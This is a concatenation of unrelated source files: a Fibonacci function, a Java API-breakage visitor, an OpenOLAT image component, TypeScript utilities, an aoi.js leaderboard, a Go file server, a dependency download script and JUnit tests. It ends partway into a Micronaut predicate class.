|
def fibonacciSequence(n):
    """Return the n-th Fibonacci number (F(0) = 0, F(1) = 1).

    Iterative implementation: O(n) time and O(1) space. The original
    naive double recursion was exponential in n and recursed forever
    for negative inputs; negative n now raises ValueError instead.

    Args:
        n: non-negative index into the Fibonacci sequence.

    Returns:
        The n-th Fibonacci number as an int.

    Raises:
        ValueError: if n is negative.
    """
    if n < 0:
        raise ValueError("n must be non-negative")
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a
# Demo: print the first ten Fibonacci numbers, F(0) through F(9).
for n in range(10):
    print(fibonacciSequence(n))
<gh_stars>0
package com.github.maracas.visitors;
import com.github.maracas.brokenuse.APIUse;
import japicmp.model.JApiCompatibilityChange;
import spoon.SpoonException;
import spoon.reflect.code.CtAssignment;
import spoon.reflect.code.CtExpression;
import spoon.reflect.code.CtInvocation;
import spoon.reflect.code.CtLocalVariable;
import spoon.reflect.declaration.CtMethod;
import spoon.reflect.declaration.CtType;
import spoon.reflect.declaration.CtTypeInformation;
import spoon.reflect.reference.CtExecutableReference;
import spoon.reflect.reference.CtFieldReference;
import spoon.reflect.reference.CtReference;
import spoon.reflect.reference.CtTypeReference;
import java.util.Collection;
import java.util.HashSet;
import java.util.Set;
import java.util.stream.Collectors;
/**
 * Visitor in charge of gathering all supertype-removed issues in client code.
 * <p>
 * The visitor detects the following cases:
 * <ul>
 * <li>Methods overriding methods declared within the supertype. Example:
 *
 * <pre>
 * @Override
 * public void m() {
 * 	return;
 * }
 * </pre>
 *
 * <li>Accessing supertype fields via subtypes. Example:
 *
 * <pre>
 * AffectedSubtype.field;
 * </pre>
 *
 * <li>Invoking supertype methods via subtypes. Example:
 *
 * <pre>
 * AffectedSubtype.method();
 * </pre>
 *
 * <li>Casting local variables with removed supertype. Example:
 *
 * <pre>
 * RemovedSupertype s = (RemovedSupertype) subtypeObj;
 * </pre>
 * </ul>
 */
public class SupertypeRemovedVisitor extends BreakingChangeVisitor {
	/**
	 * Spoon reference to the class that removed the supertype(s).
	 */
	protected final CtTypeReference<?> clsRef;

	/**
	 * Set of removed supertypes of the class (interfaces and classes).
	 */
	protected final Set<CtTypeReference<?>> supertypes;

	/**
	 * Set of methods defined within the removed supertypes.
	 */
	protected final Set<CtExecutableReference<?>> superMethods;

	/**
	 * Set of field names defined within the removed supertypes.
	 */
	protected final Set<String> superFields;

	/**
	 * Creates a SupertypeRemovedVisitor instance.
	 *
	 * @param clsRef     class that removed the supertype(s)
	 * @param supertypes set of removed supertypes
	 * @param change     kind of breaking change (interface removed or superclass
	 *                   removed)
	 */
	protected SupertypeRemovedVisitor(CtTypeReference<?> clsRef, Set<CtTypeReference<?>> supertypes,
		JApiCompatibilityChange change) {
		super(change);
		this.clsRef = clsRef;
		this.supertypes = supertypes;
		// Pre-compute the members declared by the removed supertypes so each
		// visit below is a cheap set lookup.
		this.superMethods = supertypes.stream().map(CtTypeInformation::getDeclaredExecutables).flatMap(Collection::stream)
			.collect(Collectors.toSet());
		this.superFields = supertypes.stream().map(CtTypeInformation::getDeclaredFields).flatMap(Collection::stream)
			.map(CtReference::getSimpleName).collect(Collectors.toSet());
	}

	/**
	 * Reports field accesses that resolved to a supertype field through a
	 * subtype of the affected class and no longer have a declaration there.
	 */
	@Override
	public <T> void visitCtFieldReference(CtFieldReference<T> fieldRef) {
		if (!superFields.contains(fieldRef.getSimpleName()))
			return;
		CtTypeReference<?> typeRef = fieldRef.getDeclaringType();
		try {
			if (typeRef != null && typeRef.isSubtypeOf(clsRef)) {
				CtFieldReference<?> declRef = typeRef.getDeclaredField(fieldRef.getSimpleName());
				if (declRef == null)
					brokenUse(fieldRef, fieldRef, clsRef, APIUse.FIELD_ACCESS);
			}
		} catch (SpoonException e) {
			// FIXME: Find fancier solution. A declaration cannot be resolved
		}
	}

	/**
	 * Reports invocations of supertype methods made via subtypes of the
	 * affected class.
	 */
	@Override
	public <T> void visitCtInvocation(CtInvocation<T> invocation) {
		if (!superMethods.contains(invocation.getExecutable()))
			return;
		// Guard against invocations with no enclosing type (previously an
		// unconditional cast that could throw NullPointerException).
		CtType<?> parent = invocation.getParent(CtType.class);
		if (parent == null)
			return;
		CtTypeReference<?> typeRef = parent.getReference();
		try {
			if (typeRef.isSubtypeOf(clsRef)) {
				brokenUse(invocation, invocation.getExecutable(), clsRef, APIUse.METHOD_INVOCATION);
			}
		} catch (SpoonException e) {
			// FIXME: Find fancier solution. A declaration cannot be resolved
		}
		// FIXME: cases where a static access is performed via the supertype
		// must not be registered as a broken use.
		// var target = invocation.getTarget();
		// if (methRef.isStatic() && target instanceof CtTypeAccess<?>
		// && supertypes.contains(((CtTypeAccess<?>) target).getAccessedType()))
		// return;
	}

	/**
	 * Reports client methods that override a method declared within one of
	 * the removed supertypes.
	 */
	@Override
	public <T> void visitCtMethod(CtMethod<T> m) {
		// noneMatch reads more directly than the former !anyMatch(...)
		if (superMethods.stream().noneMatch(superM -> superM.getSignature().equals(m.getSignature())))
			return;
		try {
			if (m.getDeclaringType().isSubtypeOf(clsRef)) {
				CtExecutableReference<?> superMeth = m.getReference().getOverridingExecutable();
				if (superMeth != null && superMethods.contains(superMeth))
					brokenUse(m, superMeth, clsRef, APIUse.METHOD_OVERRIDE);
			}
		} catch (SpoonException e) {
			// A declaration cannot be resolved
			// FIXME: deal with this issue in a fancier way?
		}
	}

	@Override
	public <T, A extends T> void visitCtAssignment(CtAssignment<T, A> assignment) {
		visitExpAssignment(assignment.getAssignment());
	}

	@Override
	public <T> void visitCtLocalVariable(CtLocalVariable<T> localVariable) {
		visitExpAssignment(localVariable.getAssignment());
	}

	/**
	 * Visits an assignment expression and adds a new broken use if the
	 * expression is cast to a removed supertype while its type is a subtype
	 * of the affected class.
	 *
	 * @param <T>        type of the expression
	 * @param assignExpr assignment expression (may be null for uninitialized
	 *                   local variables)
	 */
	private <T> void visitExpAssignment(CtExpression<T> assignExpr) {
		// FIXME: when dealing with interfaces this issue is not reported
		// as a compilation error.
		if (assignExpr != null) {
			Set<CtTypeReference<?>> casts = new HashSet<>(assignExpr.getTypeCasts());
			CtTypeReference<?> typeRef = assignExpr.getType();
			for (CtTypeReference<?> cast : casts) {
				if (supertypes.contains(cast) && typeRef.isSubtypeOf(clsRef))
					brokenUse(assignExpr, cast, clsRef, APIUse.TYPE_DEPENDENCY);
			}
		}
	}
}
|
<gh_stars>100-1000
/**
* OLAT - Online Learning and Training<br>
* http://www.olat.org
* <p>
* Licensed under the Apache License, Version 2.0 (the "License"); <br>
* you may not use this file except in compliance with the License.<br>
* You may obtain a copy of the License at
* <p>
* http://www.apache.org/licenses/LICENSE-2.0
* <p>
* Unless required by applicable law or agreed to in writing,<br>
* software distributed under the License is distributed on an "AS IS" BASIS, <br>
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. <br>
* See the License for the specific language governing permissions and <br>
* limitations under the License.
* <p>
* Copyright (c) since 2004 at Multimedia- & E-Learning Services (MELS),<br>
* University of Zurich, Switzerland.
* <hr>
* <a href="http://www.openolat.org">
* OpenOLAT - Online Learning and Training</a><br>
* This file has been modified by the OpenOLAT community. Changes are licensed
* under the Apache 2.0 license as the original file.
* <p>
*/
package org.olat.core.gui.components.image;
import java.io.File;
import java.util.Collections;
import java.util.UUID;
import org.olat.core.CoreSpringFactory;
import org.olat.core.commons.services.image.ImageService;
import org.olat.core.commons.services.image.Size;
import org.olat.core.commons.services.video.MovieService;
import org.olat.core.dispatcher.mapper.MapperService;
import org.olat.core.dispatcher.mapper.manager.MapperKey;
import org.olat.core.gui.UserRequest;
import org.olat.core.gui.components.AbstractComponent;
import org.olat.core.gui.components.ComponentRenderer;
import org.olat.core.gui.control.Disposable;
import org.olat.core.gui.render.ValidationResult;
import org.apache.logging.log4j.Logger;
import org.olat.core.logging.Tracing;
import org.olat.core.util.StringHelper;
import org.olat.core.util.UserSession;
import org.olat.core.util.WebappHelper;
import org.olat.core.util.vfs.LocalFileImpl;
import org.olat.core.util.vfs.VFSLeaf;
import org.olat.core.util.vfs.VFSMediaMapper;
/**
* Description: <br>
*
* @author <NAME>
*/
public class ImageComponent extends AbstractComponent implements Disposable {
private static final ComponentRenderer RENDERER = new ImageRenderer();
private static final Logger log = Tracing.createLoggerFor(ImageComponent.class);
private VFSLeaf media;
private String mimeType;
private String alt;
private String cssClasses;
private final MapperKey mapperUrl;
private final VFSMediaMapper mapper;
// optional in case of video: poster image
private VFSLeaf poster;
private MapperKey posterMapperUrl;
private VFSMediaMapper posterMapper;
private Size realSize;
private Size scaledSize;
private float scalingFactor;
private boolean divImageWrapper = true;
private boolean cropSelectionEnabled = false;
private boolean preventBrowserCaching = true;
private final MapperService mapperService;
/**
*
* @param usess The user session
* @param name The name of the component
*/
public ImageComponent(UserSession usess, String name) {
super(name);
mapper = new VFSMediaMapper();
String mapperId = UUID.randomUUID().toString();
mapperService = CoreSpringFactory.getImpl(MapperService.class);
mapperUrl = mapperService.register(usess, mapperId, mapper);
// optional poster frame for videos
posterMapper = new VFSMediaMapper();
posterMapperUrl = mapperService.register(usess, mapperId + "-poster", posterMapper);
// renderer provides own DOM ID
setDomReplacementWrapperRequired(false);
}
public String getAlt() {
return alt;
}
public void setAlt(String alt) {
this.alt = alt;
}
public boolean isPreventBrowserCaching() {
return preventBrowserCaching;
}
public void setPreventBrowserCaching(boolean preventBrowserCaching) {
this.preventBrowserCaching = preventBrowserCaching;
}
public boolean isDivImageWrapper() {
return divImageWrapper;
}
public void setDivImageWrapper(boolean divImageWrapper) {
this.divImageWrapper = divImageWrapper;
}
@Override
protected void doDispatchRequest(UserRequest ureq) {
//
}
public boolean isCropSelectionEnabled() {
return cropSelectionEnabled;
}
public void setCropSelectionEnabled(boolean enable) {
cropSelectionEnabled = enable;
}
public String getCssClasses() {
return cssClasses;
}
public void setCssClasses(String cssClasses) {
this.cssClasses = cssClasses;
}
/**
* @return Long
*/
public Size getScaledSize() {
return scaledSize;
}
public Size getRealSize() {
if(realSize == null) {
String suffix = getSuffix(getMimeType());
if(StringHelper.containsNonWhitespace(suffix)) {
if(suffix.equalsIgnoreCase("jpg") || suffix.equalsIgnoreCase("png") || suffix.equalsIgnoreCase("jpeg")) {
realSize = CoreSpringFactory.getImpl(ImageService.class).getSize(media, suffix);
} else if(suffix.equalsIgnoreCase("mp4") || suffix.equalsIgnoreCase("m4v") || suffix.equalsIgnoreCase("flv")) {
realSize = CoreSpringFactory.getImpl(MovieService.class).getSize(media, suffix);
}
}
}
return realSize;
}
public float getScalingFactor() {
return scalingFactor;
}
public VFSLeaf getMedia() {
return media;
}
public VFSLeaf getPoster() {
return poster;
}
@Override
public void dispose() {
if(mapper != null) {
mapperService.cleanUp(Collections.<MapperKey>singletonList(mapperUrl));
}
if(posterMapper != null) {
mapperService.cleanUp(Collections.<MapperKey>singletonList(posterMapperUrl));
}
}
/**
* Sets the image to be delivered. The image can be
* delivered several times. Don't set a resource which
* can be only send once.
*
* @param mediaResource
*/
public void setMedia(VFSLeaf media) {
setDirty(true);
this.media = media;
this.mimeType = null;
mapper.setMediaFile(media);
realSize = null;
}
public void setMedia(VFSLeaf media, String mimeType) {
setDirty(true);
this.media = media;
this.mimeType = mimeType;
mapper.setMediaFile(media);
realSize = null;
}
public void setMedia(File mediaFile) {
setDirty(true);
setMedia(new LocalFileImpl(mediaFile));
}
public void setPoster(VFSLeaf poster) {
setDirty(true);
this.poster = poster;
posterMapper.setMediaFile(poster);
}
public String getMapperUrl() {
return mapperUrl.getUrl();
}
public String getPosterMapperUrl() {
return posterMapperUrl.getUrl();
}
public String getMimeType() {
if(mimeType != null) {
return mimeType;
}
if(media == null) {
return null;
}
return WebappHelper.getMimeType(media.getName());
}
@Override
public ComponentRenderer getHTMLRendererSingleton() {
return RENDERER;
}
@Override
public void validate(UserRequest ureq, ValidationResult vr) {
super.validate(ureq, vr);
if(isCropSelectionEnabled()) {
vr.getJsAndCSSAdder().addRequiredStaticJsFile("js/jquery/cropper/cropper.min.js");
}
}
/**
* Call this method to display the image within a given box of width and
* height. The method does NOT manipulate the image itself, it does only
* adjust the images width and height tag. <br />
* The image will made displayed smaller, it will not enlarge the image since
* this always looks bad. The scaling is done in a way to get an image that is
* smaller than the maxWidth or smaller than the maxHeight, depending on whith
* of the sizes produce a smaller scaling factor. <br />
* To scale an image on the filesystem to another width and height, use the
* ImageHelper.scaleImage() method.
*
* @param maxWidth
* @param maxHeight
*/
public void setMaxWithAndHeightToFitWithin(int maxWidth, int maxHeight) {
if (media == null || !media.exists()) {
scalingFactor = Float.NaN;
realSize = null;
scaledSize = null;
return;
}
try {
Size size = getRealSize();
if(size == null) {
return;
}
int realWidth = size.getWidth();
int realHeight = size.getHeight();
// calculate scaling factor
scalingFactor = 1f;
if (realWidth > maxWidth) {
float scalingWidth = 1f / realWidth * maxWidth;
scalingFactor = (scalingWidth < scalingFactor ? scalingWidth : scalingFactor);
}
if (realHeight > maxHeight) {
float scalingHeight = 1f / realHeight * maxHeight;
scalingFactor = (scalingHeight < scalingFactor ? scalingHeight : scalingFactor);
}
realSize = new Size(realWidth, realHeight, false);
scaledSize = new Size(Math.round(realWidth * scalingFactor), Math.round(realHeight * scalingFactor), false);
setDirty(true);
} catch (Exception e) {
// log error, don't do anything else
log.error("Problem while setting image size to fit " + maxWidth + "x" + maxHeight + " for resource::" + media, e);
}
}
protected String getSuffix(String contentType) {
if(!StringHelper.containsNonWhitespace(contentType)) return null;
contentType = contentType.toLowerCase();
if(contentType.indexOf("jpg") >= 0 || contentType.indexOf("jpeg") >= 0) {
return "jpg";
}
if(contentType.indexOf("gif") >= 0) {
return "gif";
}
if(contentType.indexOf("png") >= 0) {
return "png";
}
if(contentType.indexOf("png") >= 0) {
return "png";
}
if(contentType.indexOf("m4v") >= 0) {
return "m4v";
}
if(contentType.indexOf("mp4") >= 0) {
return "mp4";
}
if(contentType.indexOf("webm") >= 0) {
return "webm";
}
if(contentType.indexOf("webp") >= 0) {
return "webp";
}
if(contentType.indexOf("flv") >= 0) {
return "flv";
}
return null;
}
} |
<reponame>smarulanda97/nextjs-spa5sentidos-v2<filename>src/utils/menuUtils.ts
import { Menu } from '@types-app/global';
// Maps a "<name>Menu" key (as built by normalizeMenus) to its Menu object.
type GetMenus = {
  [key: string]: Menu;
};
/**
 * Normalizes raw menu data into a map keyed by `<name>Menu`.
 *
 * For each requested menu name, looks up `<name>Menu` in `data`; when the
 * value is an array, the first element is used, otherwise an empty object.
 *
 * @param menus - base menu names to normalize (e.g. "header" -> "headerMenu")
 * @param data - raw payload containing `<name>Menu` arrays
 * @returns map from `<name>Menu` to the normalized menu object
 */
export function normalizeMenus(menus: string[], data: any): GetMenus {
  const normalizedData = {};

  if (!menus.length || !data) {
    return normalizedData;
  }

  // BUG FIX: the original used Array.prototype.map purely for side effects;
  // a for...of loop expresses the intent (iteration, not transformation).
  for (const menu of menus) {
    const menuName = `${menu}Menu`;
    let menuObject = {};

    if (menuName in data && Array.isArray(data[menuName])) {
      menuObject = data[menuName][0];
    }

    normalizedData[menuName] = menuObject;
  }

  return normalizedData;
}
|
<filename>packages/graphql-codegen-cli/src/loaders/documents/document-loader.ts
import { validate, GraphQLSchema, GraphQLError, specifiedRules } from 'graphql';
import { DocumentNode, Source, parse, concatAST, logger } from 'graphql-codegen-core';
import * as fs from 'fs';
import * as path from 'path';
import { extractDocumentStringFromCodeFile } from '../../utils/document-finder';
/**
 * Loads a GraphQL document from disk. `.graphql`/`.gql` files are parsed
 * directly; for any other extension the document string is extracted from the
 * code file first. Returns null when no document can be found in a code file.
 */
export const loadFileContent = (filePath: string): DocumentNode | null => {
  if (!fs.existsSync(filePath)) {
    throw new Error(`Document file ${filePath} does not exists!`);
  }

  const fileContent = fs.readFileSync(filePath, 'utf8');
  const fileExt = path.extname(filePath);

  if (fileExt === '.graphql' || fileExt === '.gql') {
    return parse(new Source(fileContent, filePath));
  }

  const foundDoc = extractDocumentStringFromCodeFile(fileContent);

  return foundDoc ? parse(new Source(foundDoc, filePath)) : null;
};
// All standard validation rules except NoUnusedFragments, since fragments may
// be defined in files other than the ones using them.
const effectiveRules = specifiedRules.filter((f: Function) => f.name !== 'NoUnusedFragments');

/**
 * Loads all given document files, merges them into a single AST and validates
 * it against the schema. Returns the merged AST on success, otherwise the
 * list of validation errors.
 */
export const loadDocumentsSources = (
  schema: GraphQLSchema,
  filePaths: string[]
): DocumentNode | ReadonlyArray<GraphQLError> => {
  const documents = filePaths.map(loadFileContent).filter(doc => doc);
  const mergedAst = concatAST(documents);
  const validationErrors = validate(schema, mergedAst, effectiveRules);

  return validationErrors.length === 0 ? mergedAst : validationErrors;
};
|
<gh_stars>0
// Barrel file: re-export the HoverShadowBox component as this folder's default.
import HoverShadowBox from "./HoverShadowBox"

export default HoverShadowBox
|
<reponame>AkaruiDevelopment/aoi.js
const {
AoijsAPI,
DbdTsDb,
AoiMongoDb,
Promisify,
CustomDb,
} = require("../../../classes/Database.js");
/**
 * Builds a guild leaderboard string for a stored variable, sorted by its
 * numeric value (descending by default).
 *
 * Arguments read from data.inside.splits:
 *   variable ; type ("asc" | "desc") ; custom template ; list size ; page ; table
 *
 * Supported template placeholders: {top}, {id}, {name}, {username}, {value}
 * and {execute:<awaited command>}.
 */
module.exports = async (d) => {
    const data = d.util.aoiFunc(d);
    if (data.err) return d.error(data.err);

    const [
        variable,
        type = "asc",
        custom = `{top}) {username} : {value}`,
        list = 10,
        page = 1,
        table = d.client.db.tables[0],
    ] = data.inside.splits;

    const all = await d.client.db.all(table, variable.addBrackets(), 1);
    // Rank counter; only incremented for entries whose guild resolves.
    // (Renamed from "y", which was shadowed by the old sort-callback params.)
    let rank = 0;
    let value;
    let content = [];

    // Sort descending by the stored numeric value. How the value is read
    // depends on which database adapter the client uses.
    for (const Data of all.sort((a, b) => {
        if (d.client.db instanceof AoijsAPI) {
            if (d.client.db.type === "aoi.db")
                return Number(b.value) - Number(a.value);
            else return Number(b.data.value) - Number(a.data.value);
        } else if (d.client.db instanceof DbdTsDb) {
            return (
                Number(b[variable.addBrackets()]) - Number(a[variable.addBrackets()])
            );
        } else if (d.client.db instanceof AoiMongoDb) {
            return Number(b.value) - Number(a.value);
        } else if (
            d.client.db instanceof CustomDb ||
            d.client.db instanceof Promisify
        ) {
            return (
                Number(
                    b.value ||
                        b[variable.addBrackets()] ||
                        (typeof b.Data === "object" ? b.Data.value : b.Data),
                ) -
                Number(
                    a.value ||
                        a[variable.addBrackets()] ||
                        (typeof a.Data === "object" ? a.Data.value : a.Data),
                )
            );
        }
    })) {
        let user;
        if (d.client.db instanceof AoijsAPI) {
            if (d.client.db.type === "aoi.db") value = Number(Data.value);
            else value = Number(Data.data.value);
            user = await d.util.getGuild(d, Data.key.split("_")[1]);
        } else if (d.client.db instanceof DbdTsDb) {
            value = Number(Data[variable.addBrackets()]);
            user = await d.util.getGuild(d, Data.key.split("_")[0]);
        } else if (d.client.db instanceof AoiMongoDb) {
            value = Number(Data.value);
            user = await d.util.getGuild(d, Data.key.split("_")[1]);
        } else if (
            d.client.db instanceof CustomDb ||
            d.client.db instanceof Promisify
        ) {
            value = Number(
                Data.value ||
                    Data[variable.addBrackets()] ||
                    (typeof Data.Data === "object" ? Data.Data.value : Data.Data),
            );
            // Custom adapters store the record key under different property names.
            if (Data.key) {
                const arr = Data.key.split("_");
                user = await d.util.getGuild(d, arr.length === 2 ? arr[1] : arr[0]);
            } else if (Data.id) {
                const arr = Data.id.split("_");
                user = await d.util.getGuild(d, arr.length === 2 ? arr[1] : arr[0]);
            } else if (Data.ID) {
                const arr = Data.ID.split("_");
                user = await d.util.getGuild(d, arr.length === 2 ? arr[1] : arr[0]);
            } else if (Data.Id) {
                const arr = Data.Id.split("_");
                user = await d.util.getGuild(d, arr.length === 2 ? arr[1] : arr[0]);
            } else {
                d.aoiError.fnError(
                    d,
                    "custom",
                    {},
                    "database Not Supported For LeaderBoard",
                );
                break;
            }
        }

        if (user) {
            rank++;
            let text = custom
                .replace(`{top}`, rank)
                .replace("{id}", user.id)
                .replace(`{name}`, user.name.removeBrackets())
                // BUG FIX: the default template uses {username}, which was never
                // substituted; replace it the same way as {name}.
                .replace(`{username}`, user.name.removeBrackets())
                .replace(`{value}`, value);

            if (text.includes("{execute:")) {
                let ins = text.split("{execute:")[1].split("}")[0];
                const awaited = d.client.cmd.awaited.find((c) => c.name === ins);
                if (!awaited)
                    return d.aoiError.fnError(
                        d,
                        "custom",
                        { inside: data.inside },
                        ` Invalid awaited command '${ins}' in`,
                    );
                const CODE = await d.interpreter(
                    d.client,
                    {
                        guild: user,
                        channel: d.message.channel,
                    },
                    d.args,
                    awaited,
                    undefined,
                    true,
                );
                text = text.replace(`{execute:${ins}}`, CODE);
            }
            content.push(text);
        }
    }

    // The sort above is descending; "desc" flips it to ascending (kept as-is
    // for backward compatibility with existing bots).
    if (type === "desc") content = content.reverse();

    const px = page * list - list,
        py = page * list;
    data.result = content.slice(px, py).join("\n");

    return {
        code: d.util.setCode(data),
    };
};
<reponame>eloymg/vulcan-checks
/*
Copyright 2020 Adevinta
*/
package main
import (
"fmt"
"log"
"net/http"
"os"
"strings"
)
// FileSystem wraps an http.FileSystem to customize how paths are opened
// (see Open, which refuses to serve directories without an index.html).
type FileSystem struct {
	fs http.FileSystem
}
// Open opens path from the wrapped filesystem. Directories are only served
// when they contain an index.html file, which effectively disables
// auto-generated directory listings.
func (fs FileSystem) Open(path string) (http.File, error) {
	f, err := fs.fs.Open(path)
	if err != nil {
		return nil, err
	}

	s, err := f.Stat()
	// BUG FIX: the Stat error was previously ignored, risking a nil
	// dereference on s.IsDir() below.
	if err != nil {
		f.Close()
		return nil, err
	}
	if s.IsDir() {
		index := strings.TrimSuffix(path, "/") + "/index.html"
		idx, err := fs.fs.Open(index)
		if err != nil {
			// BUG FIX: close the directory handle before bailing out to
			// avoid leaking a file descriptor.
			f.Close()
			return nil, err
		}
		// BUG FIX: the probe handle for index.html was never closed.
		idx.Close()
	}

	return f, nil
}
// main serves the directory given as the first CLI argument on port 3000,
// using the listing-suppressing FileSystem wrapper.
func main() {
	if len(os.Args) < 2 {
		fmt.Println("Usage: server DIRECTORY")
		os.Exit(1)
	}

	handler := http.FileServer(FileSystem{http.Dir(os.Args[1])})
	http.Handle("/", handler)

	log.Println("Listening on :3000...")
	if err := http.ListenAndServe(":3000", nil); err != nil {
		log.Fatal(err)
	}
}
|
#!/bin/bash
# Download (but do not install) the .deb packages for the build dependencies
# listed in DEPPACKS into the ./packages directory.
DEPPACKS="flex bison libboost-all-dev verilator libtcl8.6 libreadline-dev tcl8.6-dev tcl-dev python3-venv libgmp3-dev libmpfr-dev libmpc-dev subversion libncurses-dev"
# BUG FIX: abort when the target directory is missing instead of silently
# downloading everything into the current directory.
cd packages || exit 1
# apt-get --print-uris lists download URIs quoted on lines starting with ';
# strip the quotes to get bare URLs.
apt-get --print-uris install $DEPPACKS | grep "^'" | sed "s/^'\([^']*\)'.*$/\1/g" > all.deps
for i in $(cat all.deps) ; do wget -nv $i ; done
|
<reponame>Vidhyadharantechdays/http-patch-jax-rs
/*
* The MIT License (MIT)
*
* Copyright (c) 2018 <NAME> < <EMAIL> >
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
package com.labkit.test.personapi;
import com.vidhya.java.http.patch.jax.rs.entity.Person;
import com.vidhya.java.http.patch.jax.rs.entity.PersonUtil;
import static org.hamcrest.CoreMatchers.equalTo;
import static org.hamcrest.CoreMatchers.is;
import static org.hamcrest.CoreMatchers.not;
import javax.validation.constraints.AssertFalse;
import org.junit.Assert;
import org.junit.BeforeClass;
import org.junit.Test;
/**
*
* @author <NAME> (<EMAIL>)
*/
/**
 * Unit tests for {@link Person} and {@link PersonUtil}.
 *
 * @author <NAME> (<EMAIL>)
 */
public class PersonTest {

    // Shared fixture, built once per class. NOTE(review): equalsNameTest
    // mutates this shared instance, so the tests are not fully isolated;
    // the assertions below are written to hold regardless of test order.
    static Person vidhya = null;

    PersonUtil pu = new PersonUtil();

    /** Builds the shared fixture person used by the tests below. */
    @BeforeClass
    public static void initialize() {
        vidhya = new Person();
        vidhya.setAge(30);
        vidhya.setEmail("<EMAIL>");
        vidhya.setTwitter("vidhya03");
        vidhya.setLocale("English");
        vidhya.setName("<NAME>");
    }

    /** Exercises getters, toString, hashCode and the stepwise equals contract. */
    @Test
    public void testPerson() {
        String name = "<NAME>",
                locale = "English", twitter = "vidhya03",
                email = "<EMAIL>";
        Integer age = 30;
        Assert.assertThat("Verify age", age, is(equalTo(vidhya.getAge())));
        Assert.assertThat("Verify Name", name, is(equalTo(vidhya.getName())));
        Assert.assertThat("Verify Locale", locale, is(equalTo(vidhya.getLocale())));
        Assert.assertThat("Verify Twitter", twitter, is(equalTo(vidhya.getTwitter())));
        Assert.assertThat("Verify Email", email, is(equalTo(vidhya.getEmail())));
        Assert.assertThat("Verify Person toString", "Person{" + "name=" + name
                + ", age=" + age + ", locale=" + locale + ", twitter=" + twitter
                + ", email=" + email + '}', is(equalTo(vidhya.toString())));

        Person p = new Person();
        Assert.assertThat("Hashcode should not equal", vidhya.hashCode(), not(p.hashCode()));
        Assert.assertTrue("Object to same object equals ", p.equals(p));
        Assert.assertFalse("Object to null equals ", p.equals(null));
        // A plain literal suffices to test the "other class" branch
        // (the String(String) wrapper constructor is redundant).
        Assert.assertFalse("Object to other class ", p.equals("test"));
        verifyEquals(vidhya, p);
        // Copy one field at a time; equals must stay false until all match.
        p.setName(vidhya.getName());
        verifyEquals(vidhya, p);
        p.setLocale(vidhya.getLocale());
        verifyEquals(vidhya, p);
        p.setTwitter(vidhya.getTwitter());
        verifyEquals(vidhya, p);
        p.setEmail(vidhya.getEmail());
        verifyEquals(vidhya, p);
        p.setAge(vidhya.getAge());
        Assert.assertTrue("Both object should be equal", vidhya.equals(p));
    }

    /** Asserts inequality in both directions. */
    public void verifyEquals(Person v, Person x) {
        Assert.assertFalse("Person x p to vidhya v ", x.equals(v));
        Assert.assertFalse("Vidhya v to Person x", v.equals(x));
    }

    @Test
    public void testPersonUtil() {
        Person defaultPerson = PersonUtil.getDefaultPerson();
        Person p = new Person();
        p.setName("Vidhya");
        p.setAge(29);
        p.setLocale("en");
        p.setTwitter("vidhya03");
        p.setEmail("<EMAIL>");
        Assert.assertThat("Default person ", defaultPerson, is(p));
    }

    @Test
    public void testSearchPerson() {
        Person defaultPerson = PersonUtil.getDefaultPerson();
        Assert.assertThat("Search with name", true, is(defaultPerson.matchesAnyFileds("vidhya")));
        Assert.assertThat("Search with twitter", true, is(defaultPerson.matchesAnyFileds("vidhya03")));
    }

    @Test
    public void equalsNameTest() {
        Person p = new Person();
        p.setName(null);
        p.setAge(29);
        p.setLocale("en");
        p.setTwitter("vidhya03");
        p.setEmail("<EMAIL>");
        vidhya.setName("Sameer");
        // BUG FIX: the equals result was computed but never asserted.
        // The persons differ at least in age (29 vs 30) and name.
        Assert.assertFalse("Null name must not equal a non-null name", p.equals(vidhya));
    }

    @Test
    public void equalsEmailTest() {
        Person p = new Person();
        p.setName("Sameer");
        p.setAge(29);
        p.setLocale("en");
        p.setTwitter("vidhya03");
        p.setEmail(null);
        // BUG FIX: the equals result was computed but never asserted.
        Assert.assertFalse("Null email must not equal a non-null email", p.equals(vidhya));
    }

    @Test
    public void equalsLocaleTest() {
        Person p = new Person();
        p.setName("Sameer");
        p.setAge(29);
        p.setLocale(null);
        p.setTwitter("vidhya03");
        p.setEmail("<EMAIL>");
        // BUG FIX: the equals result was computed but never asserted.
        Assert.assertFalse("Null locale must not equal a non-null locale", p.equals(vidhya));
    }
}
|
<gh_stars>100-1000
/*
* Copyright 2017-2021 original authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.micronaut.data.model.jpa.criteria.impl.predicate;
import io.micronaut.core.annotation.Internal;
import io.micronaut.data.model.PersistentProperty;
import io.micronaut.data.model.jpa.criteria.PersistentPropertyPath;
import io.micronaut.data.model.jpa.criteria.impl.PredicateVisitable;
/**
* Abstract predicate represented by a property path.
*
* @param <T> The property type
* @author <NAME>
* @since 3.2
*/
@Internal
public abstract class AbstractPersistentPropertyPredicate<T> extends AbstractPredicate implements PredicateVisitable {

    // The property path this predicate applies to; shared by all subclasses.
    protected final PersistentPropertyPath<T> persistentPropertyPath;

    /**
     * @param persistentPropertyPath the property path the predicate applies to
     */
